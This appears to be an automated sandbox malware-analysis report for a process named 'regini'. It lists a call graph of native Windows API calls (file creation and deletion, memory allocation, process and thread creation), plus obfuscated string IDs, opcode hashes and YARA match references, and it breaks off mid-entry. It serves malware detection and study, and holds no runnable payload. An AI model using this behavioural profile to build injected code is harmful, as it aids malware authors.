LdrInitializeThunk 97141->97145 97142->97134 97143 938ccd 97143->97134 97145->97143 97146 9270c0 97147 9270ea 97146->97147 97150 928250 97147->97150 97149 927114 97151 92826d 97150->97151 97157 938e20 97151->97157 97153 9282bd 97154 9282c4 97153->97154 97162 938f00 97153->97162 97154->97149 97156 9282ed 97156->97149 97158 938eb5 97157->97158 97160 938e48 97157->97160 97167 34b2f30 LdrInitializeThunk 97158->97167 97159 938eee 97159->97153 97160->97153 97163 938faa 97162->97163 97164 938f2b 97162->97164 97168 34b2d10 LdrInitializeThunk 97163->97168 97164->97156 97165 938fef 97165->97156 97167->97159 97168->97165 97169 927640 97170 927658 97169->97170 97172 9276b2 97169->97172 97170->97172 97173 92b560 97170->97173 97175 92b586 97173->97175 97174 92b7b9 97174->97172 97175->97174 97200 939ae0 97175->97200 97177 92b5fc 97177->97174 97178 93c950 2 API calls 97177->97178 97179 92b61b 97178->97179 97179->97174 97180 938d30 LdrInitializeThunk 97179->97180 97181 92b6f2 97179->97181 97183 92b67d 97180->97183 97182 925e60 LdrInitializeThunk 97181->97182 97184 92b711 97181->97184 97182->97184 97183->97181 97187 92b686 97183->97187 97188 92b7a1 97184->97188 97206 9388a0 97184->97206 97185 92b6da 97189 928420 LdrInitializeThunk 97185->97189 97186 92b6b8 97221 9349b0 LdrInitializeThunk 97186->97221 97187->97174 97187->97185 97187->97186 97203 925e60 97187->97203 97194 928420 LdrInitializeThunk 97188->97194 97193 92b6e8 97189->97193 97193->97172 97196 92b7af 97194->97196 97195 92b778 97211 938950 97195->97211 97196->97172 97198 92b792 97216 938ab0 97198->97216 97201 939afa 97200->97201 97202 939b0b CreateProcessInternalW 97201->97202 97202->97177 97204 938f00 LdrInitializeThunk 97203->97204 97205 925e9e 97203->97205 97204->97205 97205->97186 97207 938917 97206->97207 97208 9388c8 97206->97208 97222 34b39b0 LdrInitializeThunk 97207->97222 97208->97195 97209 93893c 97209->97195 97212 9389c7 97211->97212 97213 938978 97211->97213 97223 34b4340 LdrInitializeThunk 97212->97223 97213->97198 97214 9389ec 97214->97198 97217 938b27 97216->97217 97219 938ad8 97216->97219 97224 34b2fb0 LdrInitializeThunk 97217->97224 97218 938b4c 97218->97188 97219->97188 97221->97185 97222->97209 97223->97214 97224->97218 96782 93c880 96785 93b780 96782->96785 96788 939a50 96785->96788 96787 93b799 96789 939a6d 96788->96789 96790 939a7e RtlFreeHeap 96789->96790 96790->96787 97225 939640 97226 939668 97225->97226 97227 9396b1 97225->97227 97228 9396c7 NtDeleteFile 97227->97228 97229 928b47 97230 928b4a 97229->97230 97231 928b01 97230->97231 97233 9273e0 97230->97233 97234 9273f6 97233->97234 97236 92742f 97233->97236 97234->97236 97237 927250 LdrLoadDll LdrLoadDll 97234->97237 97236->97231 97237->97236 97238 929f45 97239 929f50 97238->97239 97240 929f79 97239->97240 97241 93b780 RtlFreeHeap 97239->97241 97241->97240 96796 34b2ad0 LdrInitializeThunk 96797 923433 96802 9280a0 96797->96802 96801 92345f 96803 9280ba 96802->96803 96807 923443 96802->96807 96811 938dd0 96803->96811 96806 9396e0 NtClose 96806->96807 96807->96801 96808 9396e0 96807->96808 96809 9396fd 96808->96809 96810 93970e NtClose 96809->96810 96810->96801 96812 938dea 96811->96812 96815 34b35c0 LdrInitializeThunk 96812->96815 96813 92818a 96813->96806 96815->96813 97252 9393f0 97253 9394a1 97252->97253 97255 93941c 97252->97255 97254 9394b7 NtCreateFile 97253->97254 96818 91b820 96821 93b6f0 96818->96821 96820 91ce91 96824 939850 96821->96824 96823 93b721 96823->96820 96825 9398df 96824->96825 96827 939878 96824->96827 96826 9398f5 NtAllocateVirtualMemory 96825->96826 96826->96823 96827->96823 97256 919de0 97258 919def 97256->97258 97257 919e30 97258->97257 97259 919e1d CreateThread 97258->97259 97260 9210e0 97261 9210f9 97260->97261 97262 924880 2 API calls 97261->97262 97263 921117 97262->97263 97264 921163 97263->97264 97265 921150 PostThreadMessageW 97263->97265 97265->97264 97266 927460 97267 92747c 97266->97267 97271 9274cf 97266->97271 97269 9396e0 NtClose 97267->97269 97267->97271 97268 927607 97270 927497 97269->97270 97276 926880 NtClose LdrInitializeThunk LdrInitializeThunk 97270->97276 97271->97268 97277 926880 NtClose LdrInitializeThunk LdrInitializeThunk 97271->97277 97273 9275e1 97273->97268 97278 926a50 NtClose LdrInitializeThunk LdrInitializeThunk 97273->97278 97276->97271 97277->97273 97278->97268 96828 9362a0 96829 9362fa 96828->96829 96831 936307 96829->96831 96832 933cb0 96829->96832 96833 93b6f0 NtAllocateVirtualMemory 96832->96833 96835 933cf1 96833->96835 96834 933dfe 96834->96831 96835->96834 96836 924880 2 API calls 96835->96836 96838 933d37 96836->96838 96837 933d80 Sleep 96837->96838 96838->96834 96838->96837 97279 938ce0 97280 938cfd 97279->97280 97283 34b2df0 LdrInitializeThunk 97280->97283 97281 938d25 97283->97281 97284 938b60 97285 938bec 97284->97285 97287 938b8b 97284->97287 97289 34b2ee0 LdrInitializeThunk 97285->97289 97286 938c1d 97289->97286 97290 931d60 97295 931d79 97290->97295 97291 931e0c 97292 931dc4 97293 93b780 RtlFreeHeap 97292->97293 97294 931dd4 97293->97294 97295->97291 97295->97292 97296 931e07 97295->97296 97297 93b780 RtlFreeHeap 97296->97297 97297->97291 97298 925f66 97299 925f09 97298->97299 97300 925f10 97299->97300 97301 928420 LdrInitializeThunk 97299->97301 97303 925f3c 97300->97303 97304 9283a0 97300->97304 97301->97300 97305 9283e4 97304->97305 97306 928405 97305->97306 97311 938a00 97305->97311 97306->97300 97308 9283f5 97309 928411 97308->97309 97310 9396e0 NtClose 97308->97310 97309->97300 97310->97306 97312 938a7a 97311->97312 97314 938a2b 97311->97314 97316 34b4650 LdrInitializeThunk 97312->97316 97313 938a9f 97313->97308 97314->97308 97316->97313 96840 922aaf 96841 922ac2 96840->96841 96844 9265f0 96841->96844 96843 922aca 96845 926623 96844->96845 96846 926647 96845->96846 96851 939250 96845->96851 96846->96843 96848 92666a 96848->96846 96849 9396e0 NtClose 96848->96849 96850 9266ec 96849->96850 96850->96843 96852 93926d 96851->96852 96855 34b2ca0 LdrInitializeThunk 96852->96855 96853 939299 96853->96848 96855->96853

                                                                  Executed Functions

                                                                  Function 00919E40 Relevance: 29.1, Strings: 23, Instructions: 386COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 27 919e40-91a1a5 28 91a1ac-91a1b3 27->28 29 91a1e5 28->29 30 91a1b5-91a1e3 28->30 31 91a1ec-91a1f8 29->31 30->28 32 91a217-91a221 31->32 33 91a1fa-91a215 31->33 34 91a232-91a23e 32->34 33->31 35 91a240-91a252 34->35 36 91a254-91a265 34->36 35->34 37 91a276-91a280 36->37 39 91a282-91a2d2 37->39 40 91a2d4-91a2e5 37->40 39->37 41 91a2f6-91a302 40->41 43 91a304-91a316 41->43 44 91a318-91a321 41->44 43->41 45 91a323-91a344 44->45 46 91a346-91a34f 44->46 45->44 48 91a355-91a370 46->48 49 91a57a-91a581 46->49 48->48 50 91a372-91a37c 48->50 51 91a5b3-91a5bd 49->51 52 91a583-91a5b1 49->52 53 91a38d-91a396 50->53 54 91a5ce-91a5d5 51->54 52->49 57 91a3a6-91a3b9 53->57 58 91a398-91a3a4 53->58 55 91a5e5-91a5ec 54->55 56 91a5d7-91a5e3 54->56 59 91a618-91a61f 55->59 60 91a5ee-91a616 55->60 56->54 62 91a3ca-91a3d6 57->62 58->53 64 91a621-91a631 59->64 65 91a686-91a68f 59->65 60->55 66 91a3d8-91a3ea 62->66 67 91a3ec-91a3fb 62->67 64->64 71 91a633-91a63d 64->71 66->62 68 91a41d-91a427 67->68 69 91a3fd-91a416 67->69 73 91a460-91a474 68->73 74 91a429-91a444 68->74 69->69 72 91a418 69->72 75 91a64e-91a657 71->75 72->49 80 91a485-91a48e 73->80 76 91a446-91a44a 74->76 77 91a44b-91a44d 74->77 78 91a659-91a662 75->78 79 91a66f call 93b3e0 75->79 76->77 81 91a44f-91a458 77->81 82 91a45e 77->82 83 91a664-91a66a 78->83 84 91a66d 78->84 90 91a674-91a684 79->90 86 91a490-91a4a0 80->86 87 91a4a2-91a4ae 80->87 81->82 82->68 83->84 89 91a63f-91a648 84->89 86->80 91 91a4b0-91a4cb 87->91 92 91a4cd-91a4d7 87->92 89->75 90->65 90->90 91->87 93 91a4e8-91a4f4 92->93 94 91a4f6-91a508 93->94 95 91a50a-91a514 93->95 94->93 97 91a525-91a52e 95->97 98 91a541-91a54b 97->98 99 91a530-91a53f 97->99 101 91a55c-91a568 98->101 99->97 102 91a575 101->102 103 91a56a-91a573 101->103 102->46 103->101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                  • API String ID: 0-844827240
                                                                  • Opcode ID: 60815bb0888396476b73bf4b146bafff3167661b62b1152055b27adf33387a55
                                                                  • Instruction ID: cda5a7e16ad10835b6bb9846d5de687d6cf8c953ea23c616ff9a8328ec693ea3
                                                                  • Opcode Fuzzy Hash: 60815bb0888396476b73bf4b146bafff3167661b62b1152055b27adf33387a55
                                                                  • Instruction Fuzzy Hash: C62279B0E06229CBEB24CF45C998BDDBBB1BB44308F1086D9D0596B280D7B95EC9DF51
                                                                  Function 0092C8D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0092C9B4
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0092C9EF
                                                                  • FindClose.KERNELBASE(?), ref: 0092C9FA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                  • Instruction ID: 633fdd4593332bd030e373b47096136e01c792fbcf35693c1f24bdb71486f74d
                                                                  • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                  • Instruction Fuzzy Hash: 283181B6A00318BBDB20DFA4DC86FFF777C9F84745F104558B909A6180DB74AA85CBA1
                                                                  Function 009393F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 009394E8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                  • Instruction ID: 87ac78cf1ae8d6f63eaaadd8b7b22cf60fa84944d90901a58fe833da7f848659
                                                                  • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                  • Instruction Fuzzy Hash: A331B3B5A01248ABDB14DF98D881EEFB7B9EF8C700F108219F919A7344D730A9518BA5
                                                                  Function 00939550 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 00939633
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                  • Instruction ID: 9afacb7ce5df2691fa83212368d10f746d1c5edf0358694624771dfe45a5476b
                                                                  • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                  • Instruction Fuzzy Hash: 7931E4B5A00208ABCB14DF98C881EEFB7B9EF88710F008209F919A7341D770A9518FA5
                                                                  Function 00939850 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(009220BB,24064BBE,009381DF,00000000,00000004,00003000,?,?,?,?,?,009381DF,009220BB), ref: 00939912
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                  • Instruction ID: 35294c42c96459f681e64d0dc5e3b4d5c47444ddab15a9efb23b63f1e831cbc1
                                                                  • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                  • Instruction Fuzzy Hash: 322128B5A00248AFDB10DF98DC41FEFB7B9EF88700F008509FA18AB240D770A9118BA5
                                                                  Function 00939640 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                  • Instruction ID: edf7f85857a054f16d1dc9df563bae807037df07395177b52127dff94c9fdb8c
                                                                  • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                  • Instruction Fuzzy Hash: 5F11AC71A012087BD620EBA4CC02FEF73ADEF85704F008149FA186B281E775B9118BE5
                                                                  Function 009396E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00939717
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction ID: 61e34e3081dabd8d3c8d14dbd5ae30e447e2a30e4d289001caa8cd3408f8a68f
                                                                  • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction Fuzzy Hash: D9E04636200214BBC220AA6ADC01FEB776CDFC6B10F118819FA89B7281C671BA1087F0
                                                                  Function 034B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                                  • Instruction ID: d63241a2a18aae7373b483b7c1a3fc93c6d21edbf596a3a91ed62631e2375831
                                                                  • Opcode Fuzzy Hash: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                                  • Instruction Fuzzy Hash: 89900235615844129180B15948845464005D7F0301B55C016E0424954C8B168A565365
                                                                  Function 034B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                                  • Instruction ID: 9b9a2e21730fc07f91e79bc385b7b080d14ee76abbd181e5c9ae828a9f952f60
                                                                  • Opcode Fuzzy Hash: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                                  • Instruction Fuzzy Hash: 06900265611544424180B15948044066005D7F1301395C11AA0554960C871A8955926D
                                                                  Function 034B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                                  • Instruction ID: 333f4155ea7d87c4d7e209d1a3297d70c7233d6824bc580103251f9ea9a8aa77
                                                                  • Opcode Fuzzy Hash: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                                  • Instruction Fuzzy Hash: 3A900265212444034145B1594414616400AC7F0201B55C026E1014990DC72789916129
                                                                  Function 034B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                                  • Instruction ID: 396b6570f076104d5c1150ea48d56f7a7c2dc83594881e9c6741e6237db4f4f4
                                                                  • Opcode Fuzzy Hash: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                                  • Instruction Fuzzy Hash: 0B90023521548C42D180B1594404A460015C7E0305F55C016A0064A94D97278E55B665
                                                                  Function 034B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                                  • Instruction ID: 4aee08b38c5292a68dcedade9ba2f6b520a9fe76b0acc18469d3a6998c6f55f2
                                                                  • Opcode Fuzzy Hash: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                                  • Instruction Fuzzy Hash: D590023521144C02D1C0B159440464A0005C7E1301F95C01AA0025A54DCB178B5977A5
                                                                  Function 034B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                                  • Instruction ID: fc6b4e8a745aaa074a5e03aad7a561231310bb6fa2572bba7574680ce270c2dc
                                                                  • Opcode Fuzzy Hash: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                                  • Instruction Fuzzy Hash: 7090023561544C02D190B15944147460005C7E0301F55C016A0024A54D87578B5576A5
                                                                  Function 034B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                                  • Instruction ID: 6f24375ad71b8bb09f5621e4411e987967ad88284b8751e1ed4a74e38ed25cda
                                                                  • Opcode Fuzzy Hash: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                                  • Instruction Fuzzy Hash: 7990043D331444030145F55D07045070047C7F5351355C037F1015D50CD733CD715135
                                                                  Function 034B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                                  • Instruction ID: a4d29bf28d3fbb100ce53a1a73fea5c5178d01811af8add5d67bd750196b01f5
                                                                  • Opcode Fuzzy Hash: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                                  • Instruction Fuzzy Hash: C8900229231444020185F559060450B0445D7E6351395C01AF1416990CC72389655325
                                                                  Function 034B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                                  • Instruction ID: dce5be06f6cb8f0a850e932ba6e3aefcd5b80adb36bf84b21f4b1116e7e66232
                                                                  • Opcode Fuzzy Hash: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                                  • Instruction Fuzzy Hash: 8C90026535144842D140B1594414B060005C7F1301F55C01AE1064954D871BCD52612A
                                                                  Function 034B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
